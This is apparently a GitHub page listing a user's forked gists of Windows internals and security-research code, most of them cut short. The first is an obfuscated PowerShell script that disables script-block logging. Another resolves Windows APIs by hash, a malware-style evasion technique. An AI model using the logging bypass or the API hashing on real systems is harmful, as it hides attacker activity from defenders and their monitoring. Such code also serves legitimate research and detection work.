gavz / ScriptBlockLogBypass.ps1
Created June 17, 2024 21:10 — forked from cobbr/ScriptBlockLogBypass.ps1
ScriptBlock Logging Bypass
# ScriptBlock Logging Bypass
# @cobbr_io
$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
If ($GroupPolicyField) {
$GroupPolicyCache = $GroupPolicyField.GetValue($null)
If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
}
gavz / CheckHvpt.c
Created June 17, 2024 20:54 — forked from tandasat/CheckHvpt.c
C code to check HVPT availability
#include <stdio.h>
#include <assert.h>
#include <Windows.h>
// Some of these definitions are taken (and modified) from https://github.com/winsiderss/systeminformer
typedef struct _SYSTEM_ISOLATED_USER_MODE_INFORMATION
{
BOOLEAN SecureKernelRunning : 1;
BOOLEAN HvciEnabled : 1;
gavz / 0000-thecus-firmware-decrypt.sh
Created June 12, 2024 22:47 — forked from nstarke/0000-thecus-firmware-decrypt.sh
Thecus Firmware Decrypt Bash Script
#!/bin/bash
#
# This script takes a Thecus Firmware Image and decrypts it.
# The encryption key is derived from one of the supported
# model names, which are listed in the firmware filename. This
# script will try every model name found in the file name
# and delete any output that does not decrypt to a gzip file.
#
# You will need the following c program compiled and passed
gavz / log_and_scripts_api_resolving_with_x64dbg.md
Created May 30, 2024 23:28 — forked from a1ext/log_and_scripts_api_resolving_with_x64dbg.md
Log and scripts used in the following video [Resolving APIs dynamically with Labeless & x64dbg] https://youtu.be/hMWuWVRkpB0

Resolving APIs dynamically with Labeless & x64dbg

Previous part Resolving APIs dynamically with Labeless & OllyDbg2

Hi — now we try to do the same things using x64dbg with a 64-bit target application...

Let's try to find out what changes we need to make in the IDA Python script...

As the base, I use the previous script (see the video on how to do the same in OllyDbg 2)

gavz / get_proc_address.c
Created May 28, 2024 20:18 — forked from mr-r3bot/get_proc_address.c
Customized GetProcAddress and GetModuleHandle and handle redirected function with API hashing
UINT32 HashStringJenkinsOneAtATime32BitA(_In_ PCHAR String)
{
SIZE_T Index = 0;
UINT32 Hash = 0;
SIZE_T Length = lstrlenA(String);
while (Index != Length)
{
Hash += String[Index++];
Hash += Hash << INITIAL_SEED;
gavz / pml4e.c
Created May 13, 2024 22:22 — forked from mvankuipers/pml4e.c
Structure defining a PML4 entry in IA-32e paging.
typedef struct _PML4E
{
union
{
struct
{
ULONG64 Present : 1; // Must be 1, region invalid if 0.
ULONG64 ReadWrite : 1; // If 0, writes not allowed.
ULONG64 UserSupervisor : 1; // If 0, user-mode accesses not allowed.
ULONG64 PageWriteThrough : 1; // Determines the memory type used to access PDPT.
gavz / pdpte.c
Created May 13, 2024 22:22 — forked from mvankuipers/pdpte.c
Structure defining a page directory pointer table (PDPT) entry in IA-32e paging.
typedef struct _PDPTE
{
union
{
struct
{
ULONG64 Present : 1; // Must be 1, region invalid if 0.
ULONG64 ReadWrite : 1; // If 0, writes not allowed.
ULONG64 UserSupervisor : 1; // If 0, user-mode accesses not allowed.
ULONG64 PageWriteThrough : 1; // Determines the memory type used to access PD.
gavz / pde.c
Created May 13, 2024 22:21 — forked from mvankuipers/pde.c
Structure defining a page directory (PD) entry in IA-32e paging.
typedef struct _PDE
{
union
{
struct
{
ULONG64 Present : 1; // Must be 1, region invalid if 0.
ULONG64 ReadWrite : 1; // If 0, writes not allowed.
ULONG64 UserSupervisor : 1; // If 0, user-mode accesses not allowed.
ULONG64 PageWriteThrough : 1; // Determines the memory type used to access PT.
gavz / pte.c
Created May 13, 2024 22:21 — forked from mvankuipers/pte.c
Structure defining a page table (PT) entry in IA-32e paging.
typedef struct _PTE
{
union
{
struct
{
ULONG64 Present : 1; // Must be 1, region invalid if 0.
ULONG64 ReadWrite : 1; // If 0, writes not allowed.
ULONG64 UserSupervisor : 1; // If 0, user-mode accesses not allowed.
ULONG64 PageWriteThrough : 1; // Determines the memory type used to access the memory.
gavz / main.c
Created May 12, 2024 21:19 — forked from dadevel/main.c
EFS Trigger
#include <windows.h>
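// EFS trigger: create a file with FILE_ATTRIBUTE_ENCRYPTED so that NTFS has
// to encrypt it, which involves the Encrypting File System service.
// Presumably the point is to start or exercise that service; the gist does
// not say more, so confirm against the intended use.
//
// Returns 0 on success, otherwise the Win32 error code reported by
// CreateFileA (e.g. ERROR_FILE_EXISTS if .\test.txt is already present).
int main() {
    // CREATE_NEW rather than OPEN_ALWAYS: with OPEN_ALWAYS a pre-existing
    // .\test.txt would be opened instead of created -- CreateFile does not
    // apply the requested attributes to a file it merely opens, so nothing is
    // encrypted -- and FILE_FLAG_DELETE_ON_CLOSE would then destroy the
    // caller's file on CloseHandle. Failing is the safer outcome.
    //
    // FILE_ATTRIBUTE_NORMAL is documented as valid only when used alone, so it
    // is not combined with FILE_ATTRIBUTE_ENCRYPTED here.
    HANDLE file = CreateFileA(".\\test.txt",
                              GENERIC_WRITE,
                              FILE_SHARE_WRITE,
                              NULL,
                              CREATE_NEW,
                              FILE_ATTRIBUTE_ENCRYPTED | FILE_FLAG_DELETE_ON_CLOSE,
                              NULL);
    // CreateFileA signals failure with INVALID_HANDLE_VALUE, never NULL.
    if (file == INVALID_HANDLE_VALUE) {
        // Read the error code before any other API call can overwrite it.
        return (int)GetLastError();
    }
    // Closing the handle also removes the file (FILE_FLAG_DELETE_ON_CLOSE).
    CloseHandle(file);
    return 0;
}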